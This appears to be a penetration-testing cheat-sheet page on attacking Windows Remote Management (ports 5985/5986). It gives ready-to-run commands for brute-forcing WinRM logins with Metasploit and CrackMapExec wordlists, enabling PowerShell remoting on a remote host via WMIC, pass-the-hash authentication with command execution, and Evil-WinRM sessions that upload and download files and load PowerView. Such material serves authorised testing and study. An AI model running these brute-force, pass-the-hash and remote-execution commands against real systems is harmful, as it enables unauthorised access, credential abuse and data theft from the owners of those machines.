WinRM 5985 5986

use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.11.1.13
set USERNAME DISCO
set PASS_FILE /usr/share/wordlists/fasttrack.txt
set DOMAIN disco.thinc
run

2. Activate Remotely Using WMIC

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

3. Bruteforce with CrackMapExec

Bruteforce WinRM with a Username and Password List:

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

Check Credentials (Username + Password) and Execute CMD Command:

crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

Pass-the-Hash Authentication with PowerShell Command Execution:

crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'

4. EvilWinRM

Using EvilWinRM with Username and Password:

evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .

Upload/Download Files:

Upload a file to the target:

upload local_filename destination_filename

Download a file from the target:

download remote_filename destination_filename

List All Services:
```
services
```
Load Local PowerShell Scripts:
```
Powerview.ps1
```
Menu Listing Loaded Modules: Once inside EvilWinRM, you can view the available modules:
```
menu
```

PreviousADB Android Debug Bridge 5555 NextVNC 5800 5900

Last updated 1 year ago

hashtag1. Metasploit - WinRM Login Scanner

hashtag2. Activate Remotely Using WMIC

hashtag3. Bruteforce with CrackMapExecarrow-up-right

hashtag4. EvilWinRMarrow-up-right

1. Metasploit - WinRM Login Scanner

2. Activate Remotely Using WMIC

3. Bruteforce with CrackMapExec

4. EvilWinRM